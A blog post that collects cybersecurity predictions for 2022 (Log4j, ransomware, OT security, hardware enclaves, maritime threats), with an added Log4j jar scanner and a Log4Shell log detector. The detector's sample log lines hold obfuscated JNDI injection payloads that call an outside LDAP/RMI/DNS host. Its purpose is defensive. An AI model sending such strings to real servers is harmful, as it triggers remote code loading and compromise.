Cyber security trends for 2022

Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.

Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.

Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency and increased reliability, and enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated, searching for vulnerabilities and planting malware with adaptive, automated tooling built on machine learning, deep learning, artificial intelligence and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entry points for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). The article also lists CVE-2021-42550, but that one concerns Logback, a separate Java logging library with its own JNDI issue, not Log4j itself.
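The 35,863 figure comes from Google walking Maven Central's dependency graph; the check a practitioner wants to run is the same one over their own build outputs. As an added example that is not part of the original post or of Google's tooling, the Python below walks a jar (and the jars nested inside a WAR or fat jar, which is where transitive Maven dependencies end up), reads log4j-core's Maven metadata for the version, notes whether JndiLookup.class is present, and maps the version onto the fix releases for the four Log4j CVEs named above (2.15.0/2.16.0/2.17.0/2.17.1 on the main line, 2.12.2/2.12.3/2.12.4 for the Java 7 branch, 2.3.1/2.3.2 for the Java 6 branch). The sample archives are constructed in memory and are not real artifacts; the class-file bytes are a placeholder.

```python
import io
import re
import zipfile
from typing import Dict, List, NamedTuple, Tuple

# Marker files found inside a log4j-core jar
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")

# First fixed log4j-core release per CVE, for the main line and the two
# maintenance branches (2.12.x for Java 7, 2.3.x for Java 6).
FIXED: Dict[str, Dict[str, Tuple[int, ...]]] = {
    "CVE-2021-44228": {"main": (2, 15, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45046": {"main": (2, 16, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45105": {"main": (2, 17, 0), "2.12": (2, 12, 3), "2.3": (2, 3, 1)},
    "CVE-2021-44832": {"main": (2, 17, 1), "2.12": (2, 12, 4), "2.3": (2, 3, 2)},
}


class Finding(NamedTuple):
    path: str                  # "outer.war!inner.jar" for nested archives
    version: str
    jndi_lookup_present: bool
    cves: Tuple[str, ...]


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); missing parts are padded with 0, suffixes ignored."""
    parts = [int(x) for x in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def branch(v: Tuple[int, ...]) -> str:
    if v[:2] == (2, 3):
        return "2.3"
    if v[:2] == (2, 12):
        return "2.12"
    return "main"


def affected_cves(version: str, jndi_lookup_present: bool) -> Tuple[str, ...]:
    v = parse_version(version)
    if v[0] != 2:
        return ()                      # not a Log4j 2.x core jar, out of scope here
    b = branch(v)
    cves = [cve for cve, fixed in FIXED.items() if v < fixed[b]]
    if not jndi_lookup_present:
        # Deleting JndiLookup.class was the vendor-documented mitigation for the
        # two JNDI issues; the two lookup-recursion bugs still need an upgrade.
        cves = [c for c in cves if c not in ("CVE-2021-44228", "CVE-2021-45046")]
    return tuple(cves)


def scan_archive(data: bytes, path: str, findings: List[Finding]) -> List[Finding]:
    """Record any log4j-core found at this level, then recurse into nested archives."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else "unknown"
            jndi = JNDI_LOOKUP in names
            findings.append(Finding(path, version, jndi, affected_cves(version, jndi)))
        for name in names:
            if name.lower().endswith(NESTED):
                scan_archive(zf.read(name), f"{path}!{name}", findings)
    return findings


def make_archive(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def log4j_core_jar(version: str, with_jndi_lookup: bool = True) -> bytes:
    entries = {POM_PROPS: f"artifactId=log4j-core\nversion={version}\n".encode()}
    if with_jndi_lookup:
        entries[JNDI_LOOKUP] = b"\xca\xfe\xba\xbe"   # placeholder, not a real class file
    return make_archive(entries)


# Constructed sample archives (not real artifacts); the 2.15.0 jar sits inside a WAR.
SAMPLES = {
    "log4j-core-2.14.1.jar": log4j_core_jar("2.14.1"),
    "log4j-core-2.12.2.jar": log4j_core_jar("2.12.2"),
    "log4j-core-2.14.1-stripped.jar": log4j_core_jar("2.14.1", with_jndi_lookup=False),
    "log4j-core-2.17.1.jar": log4j_core_jar("2.17.1"),
    "app.war": make_archive({"WEB-INF/lib/log4j-core-2.15.0.jar": log4j_core_jar("2.15.0")}),
}


def scan_samples(samples=SAMPLES) -> Dict[str, Finding]:
    findings: List[Finding] = []
    for path, data in samples.items():
        scan_archive(data, path, findings)
    return {f.path: f for f in findings}


if __name__ == "__main__":
    for f in scan_samples().values():
        jndi = "yes" if f.jndi_lookup_present else "no"
        print(f"{f.path}: log4j-core {f.version}, JndiLookup={jndi}, "
              f"{', '.join(f.cves) or 'no Log4Shell-family CVE'}")
```

Note that a jar with JndiLookup.class removed still gets flagged for CVE-2021-45105 and CVE-2021-44832, which is the point of the article: the class-deletion workaround bought time, but only an upgrade of the dependency (and of every nested copy of it) closes the family out.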

Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
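The "large number of exploit variations" above refers to attackers wrapping the ${jndi:...} lookup inside other Log4j lookups (${lower:j}, ${::-j}, ${env:NaN:-j} and so on) so that a naive string match on "jndi" misses the payload. As an added example that is not part of the original post or of Akamai's tooling, the Python below normalizes nested lookups the way Log4j would resolve them (default values and lower/upper are applied; env, sys, date and other lookups are treated as empty, which is an assumption of this detector, not Log4j behaviour) and then reports the scheme and target of any JNDI lookup that survives. The access-log lines are constructed, with addresses from documentation ranges.

```python
import re
from typing import List, NamedTuple

# An innermost ${...} lookup: no further '$', '{' or '}' inside it
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The form we are hunting for once the obfuscation has been stripped
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^}]*)\}", re.IGNORECASE)


def _resolve(match) -> str:
    """Emulate the lookups attackers used for obfuscation (detector heuristic)."""
    expr = match.group(1)
    if expr.lstrip().lower().startswith("jndi:"):
        return match.group(0)           # keep the JNDI lookup itself for reporting
    if ":-" in expr:
        return expr.split(":-", 1)[1]   # ${name:-default} -> default (name assumed unset)
    prefix, _, rest = expr.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return ""                           # env/sys/date/ctx/...: assumed empty here


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


class Hit(NamedTuple):
    line_no: int
    scheme: str      # ldap, ldaps, rmi, dns, ...
    target: str
    normalized: str


def scan(lines: List[str]) -> List[Hit]:
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        for m in JNDI.finditer(norm):
            hits.append(Hit(n, m.group(1).lower(), m.group(2), m.group(0)))
    return hits


# Constructed access-log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:'
    '${::-r}mi://203.0.113.5:1099/x} HTTP/1.1" 404 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${env:NaN:-j}ndi:dns://203.0.113.5/${sys:java.version}}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.scheme} -> {h.target}   ({h.normalized})")
```

Run against the samples it reports the four obfuscated and plain variants with their callback targets (the hosts to block and hunt for in outbound LDAP/RMI/DNS traffic) and stays quiet on the two benign lines, including the one carrying an innocent ${date:yyyy} lookup. Matching on the normalized form rather than the raw request is what keeps the detection stable as new variants appear.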

Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.

Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.

In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.

Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021, and 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using AI-powered software and platforms that monitor real-time activity on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal or malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence (CTI) reports. Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect cyber threats more rapidly.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Smartphone security is getting an overhaul (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, hardware-backed security has been in place for more than a decade, with trusted processing performed in a TEE (Trusted Execution Environment), an isolated execution world with its own protected memory. The current standard solution for smartphone security is typically built on Arm’s TrustZone technology. The phone’s own security comes from the TEE, and secure boot usually relies on it as well. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed about 15 years ago).
The memory required by a TEE has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted secure boot and memory or flash encryption there instead, but these have been fairly weak solutions. Recently, Arm’s TrustZone-M has introduced a new security model for microcontrollers.
In recent years, this picture has begun to diversify, and a revolution is now underway. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still using the TEE).
In the future, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s Helsinki System Security Lab (HSSL). Intel introduced SGX for PC and server processors about five years ago; in short, it is a set of security extension instructions added to the CPU. In this solution, TEE-type protection is provided by a secure enclave, which needs less code than a traditional TEE structure. An enclave is a temporary structure in the device’s memory, created only for a security task and torn down when that task completes. The difference from the TEE structure is significant: there, a second kernel runs all the time alongside the operating system. With no parallel kernel, there is one component less to attack.
In Intel’s SGX, enclave memory was limited to a relatively small Enclave Page Cache (EPC), which restricted its use. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, and AMD aims to do the same with its own SEV (Secure Encrypted Virtualization).
Enclave-style solutions will also come to smartphones. The Armv9-A architecture announced in 2021 offers a realm mode (the Realm Management Extension of Arm’s Confidential Compute Architecture) that is close to the VM-based confidential computing technologies on the server side (Intel TDX, AMD SEV) rather than to SGX-style application enclaves. With the coming enclaves, an unlimited number of secured environments will be available in principle.
In the mobile ecosystem, the TEE is so deeply rooted that the transition will probably take five years. During the transition period the TEE and the more dynamic solutions will be on the market in parallel.

Cyber attacks already threaten goods deliveries too (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime, extending it from technically savvy individuals and criminal organizations to everyone. The new “Everything as a Service” model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf

Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa “kyberpandemiasta”: internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”

Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown dramatically. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those strategies include:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks

Trend Micro report: in the future, everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.

3,062 Comments

  1. Tomi Engdahl says:

    The Vulnerable Maritime Supply Chain – a Threat to the Global Economy
    https://www.securityweek.com/vulnerable-maritime-supply-chain-threat-global-economy

    Merchant vessels and ports are extraordinarily vulnerable to increasingly sophisticated cyberattacks against OT systems

    Around 90% to 95% of all shipped goods at some stage travel by sea. This makes the global maritime industry the world’s single largest and most important supply chain. Successful cyberattacks against the maritime supply chain would have the potential to damage individual companies, national finances and even the global economy.

    Attack vectors

    The maritime sector includes the ports and the vessels that use them. The vessels range from small freight carriers to oil supertankers, super cargo carriers transporting in excess of 20,000 20-foot containers, and superyachts carrying high value individuals. While the port authorities are already under threat and attack by ransomware gangs, less attention has been paid to the threat of attacks against the vessels.

    The merchant maritime sector functions with vessels that have been operational for anything from a few years to a few decades. The older vessels have had new technology added to improve efficiency through digitization and automation. Updating this technology can be very expensive and will depend on various criteria: opportunity, cost/risk assessments, economic strength of the company, and regulatory requirements. The result is that many ships in the merchant maritime sector are vulnerable to cyberattack.

    Superyachts tend to be new and packed with the very latest gadgetry. They tend to be more secure, although successful compromise offers an attacker greater control over the vessel. For example, a successful attack could give remote control over both throttle and rudder.

    John Sheehy, SVP of research and strategy at IOActive, points to three primary paths for an attacker to gain access to a vessel. “There’s WIFI; some vessels have High Frequency (HF) radio; and commercial satellite communications (SATCOM) such as Inmarsat,” he told SecurityWeek. To these we should add the USB-stick-carrying insider, and earlier compromises to the vessel’s own supply chain.

    The satellite communications often combine Inmarsat and GPS, and he considers this to be the primary threat vector – adding, “We know that a Russian APT group has the capability to remotely exploit the same types of SATCOM terminals used in maritime environments on vessels.”

    Tom Van De Wiele, principal technology and threat researcher at F-Secure, adds, “Attacks aimed at communication links can be targeted at either the vessel communication links themselves using satellite communication or the port infrastructure on shore used to communicate with the vessels at sea. This is linked to the back-end systems of the shipping IT infrastructure for container and ship monitoring systems.”

    Practical and theoretical effects of maritime supply chain damage

    There are no known serious examples of vessel compromise, but the potential effect can be seen in genuine maritime mishaps and in theoretical analyses. Genuine mishaps would include the Torrey Canyon in 1967, and the Ever Given in 2021.

    “There have been various estimates about the cost of the Suez closure, but some of them are as high as ten or eleven billion dollars a day, and those estimates were done before it was clear how long and how expensive it would be to clear the backlog that the blockage caused. Months later, there were still ships queuing up to get into Port of Los Angeles because the whole scheduling pattern had been broken.”

    “If you look at things like oil reserves, fresh food reserves, and other critical things within the UK, we have some reserves but need to receive new shipments daily. The UK has about 11 significant ports, but most container shipments come through just four ports. If those ports were effectively jammed in the ways we’ve shown we can do for other ports, it would mean that the supply of goods coming into the UK would drop dramatically – for the sake of discussion, very close to zero.”

    Removing the blocking vessels would take weeks rather than days. “Assuming the attacker could pick the conditions, coordinate the attacks in the way they want to – which is difficult, but not impossible,” he continued, “you’ve basically cut off the supply of goods to the UK: we’re not getting fresh foodstuffs and we’re not getting oil. Very quickly we’ll arrive at the point where power stations no longer have the capacity to run. There are strategic reserves that could be released, but there are consequences and logistic difficulties to doing that. So, you start losing power, you start losing freezer capacity – and frozen stores, both in homes and in bulk storage, go rotten within a week. You cascade all these effects – including loss of fuel for transport – and it is not long before you have a catastrophic failure of systems. It’s not the most likely scenario, but it is a scenario that is well within the bounds of possibility.”

    A similar exercise was done in the US by University of Illinois Urbana-Champaign. “They looked at closing just one port in Florida,” said Jones, “and they got to the point in their thought experiment where people on the east coast were shooting each other quite quickly. The general principle is that we are highly dependent on pretty much real-time resupply via shipping. Cut that out for a while, and you’ve got a real problem.”

    Attacker motivations, means and threat scenarios

    Motivations for attacking the maritime sector are fundamentally no different to those for any other industry sector. They include ethical/political (hacktivists), financial (cybercriminal gangs), and geopolitical (nation states). Hacktivism may appear the least likely, but there is no technical reason to prevent an attack against a vessel by a determined and well-resourced hacktivist group.

    The nation-state threat is perhaps the most concerning, which currently includes but goes beyond the Russia/Ukraine war. “For a number of years, it’s been known that in the northwest region around Russia GPS satnav is unreliable,” comments Jones. “It’s unreliable because Russia has been broadcasting spoofed GPS signals. Ships’ captains have reportedly said, ‘I suddenly find myself in the middle of a playing field three miles inland, but when I look out the window, the ocean is still there.’”

    In February 2022, the US Office of the Director of National Intelligence issued its annual threat assessment, saying, “Russia is investing in electronic warfare and directed energy weapons to counter western on-orbit assets. These systems work by disrupting or disabling adversary C4ISR [command, control, communications, computers, intelligence, surveillance, and reconnaissance] capabilities and by disrupting GPS, tactical and satellite communications, and radars.”

    And on March 17, 2022, CISA issued an alert warning about “possible threats to US and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers’ customer environments.”

    “There is evidence that nation states, and Russia in particular, have been experimenting with things like compromising GPS,”

    Casey Bisson, head of product and developer relations at BluBracket, comments, “The maritime industry, like all industries, is becoming increasingly dependent on industrial IoT and connected devices. Common IoT risks like weak default credentials, undocumented backdoors, and vulnerabilities that allow unauthorized remote access and control are especially concerning on vessels. Vessels at sea and in port are both vulnerable to disruption and could potentially be used as weapons in larger state conflicts.”

    IOActive’s Sheehy has similar concerns. “The War in Ukraine has caused part of the Black Sea and the Sea of Azov to become impassable, which necessarily limits exports and imports to both Russian and Ukrainian Black Sea ports. Of particular concern is Odessa, Ukraine, which is the largest commercial port on the Black Sea. The Russians could choose to use deniable cyber operations as a step up the escalation ladder to impose a cost on those countries who have imposed sanctions on them. Moreover, judicious operations could produce global effects as we saw with the blocking of the Suez Canal by the Ever Given, which was a result of pilot error.”

    An extension to the spoofed GPS signals that might confuse a ship’s captain is interference with the ship’s Automatic Identification System (AIS). This could be an approach taken by cybercriminal gangs as part of a piracy scenario. These systems broadcast identification and location information so that both other ships and shore-based authorities know exactly what ship is where. A compromised AIS could transmit either wrong information (making the ship appear to be elsewhere) or no information (making it effectively an invisible ghost ship).

    Jones described an example of a theoretical attack against a superyacht (although the basic principles could be harnessed against any vessel).

